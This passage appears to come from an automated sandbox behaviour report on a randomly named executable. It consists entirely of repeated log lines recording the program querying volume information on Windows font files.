Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
